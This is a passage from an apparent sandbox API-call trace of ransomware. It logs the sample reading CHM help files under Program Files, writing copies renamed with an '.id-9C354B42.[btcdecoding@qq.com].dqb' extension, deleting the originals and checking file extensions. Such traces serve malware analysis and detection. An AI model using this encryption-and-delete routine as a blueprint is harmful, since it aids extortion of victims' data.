Shared\\VBA\\VBA7\\1033\\FM20.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\fm20.chm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0046.290] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2efff1c | out: lpFileSize=0x2efff1c*=334427) returned 1 [0046.290] CloseHandle (hObject=0x160) returned 1 [0046.290] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\fm20.chm")) returned 0x20 [0046.290] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\fm20.chm.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0046.291] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\fm20.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0046.291] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0046.291] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0046.291] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\fm20.chm.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0046.291] GetLastError () returned 0x0 [0046.291] ReadFile (in: hFile=0x160, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x51a5b, lpOverlapped=0x0) returned 1 [0046.301] WriteFile (in: hFile=0x220, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x51a60, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x51a60, lpOverlapped=0x0) returned 1 [0046.308] ReadFile (in: hFile=0x160, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0046.308] WriteFile (in: hFile=0x220, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xe4, lpOverlapped=0x0) returned 1 [0046.308] SetEndOfFile (hFile=0x220) returned 1 [0046.308] CloseHandle (hObject=0x220) returned 1 [0046.308] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0046.308] SetEndOfFile (hFile=0x160) returned 1 [0046.311] CloseHandle (hObject=0x160) returned 1 [0046.311] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0046.311] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\fm20.chm")) returned 1 [0046.312] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM") returned 69 [0046.312] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM") returned 69 [0046.312] lstrlenW (lpString=".doc") returned 4 [0046.312] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0046.312] lstrlenW (lpString=".docx") returned 5 [0046.312] lstrcmpiW (lpString1=".docx", lpString2="0.CHM") returned -1 [0046.312] lstrlenW (lpString=".pdf") returned 4 [0046.312] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0046.312] lstrlenW (lpString=".xls") returned 4 [0046.312] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0046.312] lstrlenW (lpString=".xlsx") returned 5 [0046.312] lstrcmpiW (lpString1=".xlsx", lpString2="0.CHM") returned -1 [0046.312] lstrlenW (lpString=".ppt") returned 4 [0046.312] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0046.312] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM") returned 69 [0046.312] lstrlenW (lpString=".zip") returned 4 [0046.312] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0046.312] lstrlenW (lpString=".rar") returned 4 [0046.312] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0046.312] lstrlenW (lpString=".bz2") returned 4 [0046.312] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0046.312] lstrlenW (lpString=".7z") returned 3 [0046.312] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0046.312] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM") returned 69 [0046.312] lstrlenW (lpString=".dbf") returned 4 [0046.312] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0046.312] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM") returned 69 [0046.312] lstrlenW (lpString=".1cd") returned 4 [0046.312] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0046.312] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM") returned 69 [0046.312] lstrlenW (lpString=".jpg") returned 4 [0046.313] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0046.313] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM") returned 69 [0046.313] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM") returned 69 [0046.313] lstrlenW (lpString=".doc") returned 4 [0046.313] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0046.313] lstrlenW (lpString=".docx") returned 5 [0046.313] lstrcmpiW (lpString1=".docx", lpString2="0.CHM") returned -1 [0046.313] lstrlenW (lpString=".pdf") returned 4 [0046.313] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0046.313] lstrlenW (lpString=".xls") returned 4 [0046.313] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0046.313] lstrlenW (lpString=".xlsx") returned 5 [0046.313] lstrcmpiW (lpString1=".xlsx", lpString2="0.CHM") returned -1 [0046.313] lstrlenW (lpString=".ppt") returned 4 [0046.313] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0046.313] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM") returned 69 [0046.313] lstrlenW (lpString=".zip") returned 4 [0046.313] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0046.313] lstrlenW (lpString=".rar") returned 4 [0046.313] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0046.313] lstrlenW (lpString=".bz2") returned 4 [0046.313] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0046.313] lstrlenW (lpString=".7z") returned 3 [0046.313] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0046.313] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM") returned 69 [0046.313] lstrlenW (lpString=".dbf") returned 4 [0046.313] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0046.313] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM") returned 69 [0046.313] lstrlenW (lpString=".1cd") returned 4 [0046.313] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0046.313] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM") returned 69 [0046.313] lstrlenW (lpString=".jpg") returned 4 [0046.313] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0046.314] lstrcmpiW (lpString1=".CHM", lpString2=".dqb") returned -1 [0046.314] lstrlenW (lpString="VBCN6.CHM") returned 9 [0046.314] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbcn6.chm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0046.314] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2efff1c | out: lpFileSize=0x2efff1c*=109718) returned 1 [0046.314] CloseHandle (hObject=0x160) returned 1 [0046.314] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbcn6.chm")) returned 0x20 [0046.314] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbcn6.chm.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0046.314] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbcn6.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0046.314] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0046.314] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0046.314] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbcn6.chm.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0046.315] GetLastError () returned 0x0 [0046.315] ReadFile (in: hFile=0x160, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x1ac96, lpOverlapped=0x0) returned 1 [0046.471] WriteFile (in: hFile=0x220, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x1aca0, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x1aca0, lpOverlapped=0x0) returned 1 [0046.473] ReadFile (in: hFile=0x160, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0046.473] WriteFile (in: hFile=0x220, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xe6, lpOverlapped=0x0) returned 1 [0046.473] SetEndOfFile (hFile=0x220) returned 1 [0046.473] CloseHandle (hObject=0x220) returned 1 [0046.474] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0046.474] SetEndOfFile (hFile=0x160) returned 1 [0046.475] CloseHandle (hObject=0x160) returned 1 [0046.475] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0046.475] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbcn6.chm")) returned 1 [0046.475] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM") returned 70 [0046.475] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM") returned 70 [0046.475] lstrlenW (lpString=".doc") returned 4 [0046.475] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0046.475] lstrlenW (lpString=".docx") returned 5 [0046.475] lstrcmpiW (lpString1=".docx", lpString2="6.CHM") returned -1 [0046.475] lstrlenW (lpString=".pdf") returned 4 [0046.475] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0046.476] lstrlenW (lpString=".xls") returned 4 [0046.476] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0046.476] lstrlenW (lpString=".xlsx") returned 5 [0046.476] lstrcmpiW (lpString1=".xlsx", lpString2="6.CHM") returned -1 [0046.476] lstrlenW (lpString=".ppt") returned 4 [0046.476] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0046.476] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM") returned 70 [0046.476] lstrlenW (lpString=".zip") returned 4 [0046.476] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0046.476] lstrlenW (lpString=".rar") returned 4 [0046.476] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0046.476] lstrlenW (lpString=".bz2") returned 4 [0046.476] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0046.476] lstrlenW (lpString=".7z") returned 3 [0046.476] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0046.476] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM") returned 70 [0046.476] lstrlenW (lpString=".dbf") returned 4 [0046.476] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0046.476] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM") returned 70 [0046.476] lstrlenW (lpString=".1cd") returned 4 [0046.476] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0046.476] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM") returned 70 [0046.476] lstrlenW (lpString=".jpg") returned 4 [0046.476] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0046.476] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM") returned 70 [0046.476] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM") returned 70 [0046.476] lstrlenW (lpString=".doc") returned 4 [0046.476] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0046.476] lstrlenW (lpString=".docx") returned 5 [0046.476] lstrcmpiW (lpString1=".docx", lpString2="6.CHM") returned -1 [0046.476] lstrlenW (lpString=".pdf") returned 4 [0046.476] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0046.476] lstrlenW (lpString=".xls") returned 4 [0046.476] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0046.477] lstrlenW (lpString=".xlsx") returned 5 [0046.477] lstrcmpiW (lpString1=".xlsx", lpString2="6.CHM") returned -1 [0046.477] lstrlenW (lpString=".ppt") returned 4 [0046.477] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0046.477] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM") returned 70 [0046.477] lstrlenW (lpString=".zip") returned 4 [0046.477] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0046.477] lstrlenW (lpString=".rar") returned 4 [0046.477] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0046.477] lstrlenW (lpString=".bz2") returned 4 [0046.477] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0046.477] lstrlenW (lpString=".7z") returned 3 [0046.477] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0046.477] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM") returned 70 [0046.477] lstrlenW (lpString=".dbf") returned 4 [0046.477] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0046.477] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM") returned 70 [0046.477] lstrlenW (lpString=".1cd") returned 4 [0046.477] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0046.477] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM") returned 70 [0046.477] lstrlenW (lpString=".jpg") returned 4 [0046.477] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0046.477] lstrcmpiW (lpString1=".CHM", lpString2=".dqb") returned -1 [0046.477] lstrlenW (lpString="VBLR6.CHM") returned 9 [0046.477] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vblr6.chm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0046.478] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2efff1c | out: lpFileSize=0x2efff1c*=944994) returned 1 [0046.478] CloseHandle (hObject=0x160) returned 1 [0046.478] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vblr6.chm")) returned 0x20 [0046.478] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vblr6.chm.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0046.478] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vblr6.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0046.478] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0046.478] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0046.478] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vblr6.chm.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0046.478] GetLastError () returned 0x0 [0046.478] ReadFile (in: hFile=0x160, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0xe6b62, lpOverlapped=0x0) returned 1 [0046.497] WriteFile (in: hFile=0x220, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xe6b70, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xe6b70, lpOverlapped=0x0) returned 1 [0046.663] ReadFile (in: hFile=0x160, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0046.663] WriteFile (in: hFile=0x220, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xe6, lpOverlapped=0x0) returned 1 [0046.663] SetEndOfFile (hFile=0x220) returned 1 [0046.663] CloseHandle (hObject=0x220) returned 1 [0046.663] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0046.663] SetEndOfFile (hFile=0x160) returned 1 [0046.670] CloseHandle (hObject=0x160) returned 1 [0046.671] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0046.671] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vblr6.chm")) returned 1 [0046.671] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM") returned 70 [0046.671] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM") returned 70 [0046.671] lstrlenW (lpString=".doc") returned 4 [0046.671] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0046.671] lstrlenW (lpString=".docx") returned 5 [0046.671] lstrcmpiW (lpString1=".docx", lpString2="6.CHM") returned -1 [0046.671] lstrlenW (lpString=".pdf") returned 4 [0046.671] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0046.671] lstrlenW (lpString=".xls") returned 4 [0046.671] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0046.671] lstrlenW (lpString=".xlsx") returned 5 [0046.671] lstrcmpiW (lpString1=".xlsx", lpString2="6.CHM") returned -1 [0046.671] lstrlenW (lpString=".ppt") returned 4 [0046.671] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0046.671] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM") returned 70 [0046.671] lstrlenW (lpString=".zip") returned 4 [0046.671] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0046.671] lstrlenW (lpString=".rar") returned 4 [0046.671] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0046.671] lstrlenW (lpString=".bz2") returned 4 [0046.671] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0046.671] lstrlenW (lpString=".7z") returned 3 [0046.671] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0046.672] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM") returned 70 [0046.672] lstrlenW (lpString=".dbf") returned 4 [0046.672] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0046.672] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM") returned 70 [0046.672] lstrlenW (lpString=".1cd") returned 4 [0046.672] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0046.672] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM") returned 70 [0046.672] lstrlenW (lpString=".jpg") returned 4 [0046.672] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0046.672] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM") returned 70 [0046.672] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM") returned 70 [0046.672] lstrlenW (lpString=".doc") returned 4 [0046.672] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0046.672] lstrlenW (lpString=".docx") returned 5 [0046.672] lstrcmpiW (lpString1=".docx", lpString2="6.CHM") returned -1 [0046.672] lstrlenW (lpString=".pdf") returned 4 [0046.672] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0046.672] lstrlenW (lpString=".xls") returned 4 [0046.672] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0046.672] lstrlenW (lpString=".xlsx") returned 5 [0046.672] lstrcmpiW (lpString1=".xlsx", lpString2="6.CHM") returned -1 [0046.672] lstrlenW (lpString=".ppt") returned 4 [0046.672] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0046.672] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM") returned 70 [0046.672] lstrlenW (lpString=".zip") returned 4 [0046.672] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0046.672] lstrlenW (lpString=".rar") returned 4 [0046.672] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0046.672] lstrlenW (lpString=".bz2") returned 4 [0046.672] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0046.672] lstrlenW (lpString=".7z") returned 3 [0046.672] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0046.672] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM") returned 70 [0046.672] lstrlenW (lpString=".dbf") returned 4 [0046.672] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0046.673] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM") returned 70 [0046.673] lstrlenW (lpString=".1cd") returned 4 [0046.673] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0046.673] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM") returned 70 [0046.673] lstrlenW (lpString=".jpg") returned 4 [0046.673] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0046.673] lstrcmpiW (lpString1=".inc", lpString2=".dqb") returned 1 [0046.673] lstrlenW (lpString="oledbjvs.inc") returned 12 [0046.673] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc" (normalized: "c:\\program files\\common 